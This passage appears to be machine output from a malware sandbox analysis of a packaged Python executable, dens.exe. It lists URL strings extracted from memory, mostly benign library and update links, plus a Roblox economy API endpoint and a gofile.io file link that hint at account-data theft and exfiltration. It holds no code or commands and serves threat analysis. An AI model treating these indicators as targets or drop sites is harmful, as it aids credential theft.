00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: _uuid.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeS
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 
00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: dens.exe, 00000001.00000002.2062990584.000002D9ABAE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: dens.exe, 00000001.00000002.2062990584.000002D9ABAE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE9064D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: mshta.exe, 0000001E.00000003.1791248037.000001E0907A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.1791490293.000001E0907AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.1815210960.000001E0907AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000002.1818084355.000001E0907AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w%
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/P
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
            Source: dens.exe, 00000000.00000003.1676624069.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fsf.org/
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90656000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1792575862.000001DE906E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: dens.exe, 00000001.00000003.1701168036.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701312245.000002D9AB275000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB26D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Lucretiel/autocommand
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Lucretiel/autocommand/issues
            Source: METADATA.0.drString found in binary or memory: https://github.com/Lucretiel/autocommand/issues/18
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AD7D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterp
            Source: dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drString found in binary or memory: https://github.com/astral-sh/ruff
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://github.com/jaraco/backports.tarfile
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://github.com/jaraco/backports.tarfile/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://github.com/jaraco/backports.tarfile/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/inflect
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/inflect/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/inflect/actions?query=workflow%3A%22tests%22
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/jaraco.context
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/jaraco.context/actions/workflows/main.yml/badge.svg
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/jaraco.context/actions?query=workflow%3A%22tests%22
            Source: METADATA0.0.drString found in binary or memory: https://github.com/jaraco/jaraco.functools
            Source: METADATA0.0.drString found in binary or memory: https://github.com/jaraco/jaraco.functools/actions/workflows/main.yml/badge.svg
            Source: METADATA0.0.drString found in binary or memory: https://github.com/jaraco/jaraco.functools/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
            Source: METADATA.0.drString found in binary or memory: https://github.com/jaraco/keyring/commit/a85a7cbc6c909f8121660ed1f7b487f99a1c2bf7
            Source: dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC930000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
            Source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
            Source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
            Source: dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
            Source: METADATA14.0.drString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
            Source: dens.exe, 00000001.00000002.2062222294.000002D9AB5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
            Source: dens.exe, 00000001.00000002.2060074446.000002D9AAF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
            Source: dens.exe, 00000001.00000002.2060074446.000002D9AAF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
            Source: METADATA14.0.drString found in binary or memory: https://github.com/pypa/wheel
            Source: METADATA14.0.drString found in binary or memory: https://github.com/pypa/wheel/issues
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
            Source: dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
            Source: dens.exe, 00000001.00000003.2047858320.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041785184.000002D9AADEF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044813767.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2059506844.000002D9AADF0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
            Source: dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
            Source: dens.exe, 00000001.00000002.2057356883.000002D9AA7D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: dens.exe, 00000001.00000002.2057866234.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695470478.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050249155.000002D9AA9A5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053260653.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695730686.000002D9AACF6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AACF7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042588070.000002D9AA996000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053626399.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1698481560.000002D9AA97E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
            Source: dens.exe, 00000001.00000003.2052987876.000002D9AB1F2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065625241.000002D9AC640000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060619384.000002D9AB1F6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2045707437.000002D9AB1EF000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
            Source: dens.exe, 00000001.00000002.2062222294.000002D9AB5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_resources
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_resources/actions/workflows/main.yml/badge.svg
            Source: dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_resources/actions?query=workflow%3A%22tests%22
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek
            Source: dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek).
            Source: dens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.miH
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AE1D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: dens.exe, 00000001.00000002.2065625241.000002D9AC704000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/9x70nq
            Source: dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/9x70nq)
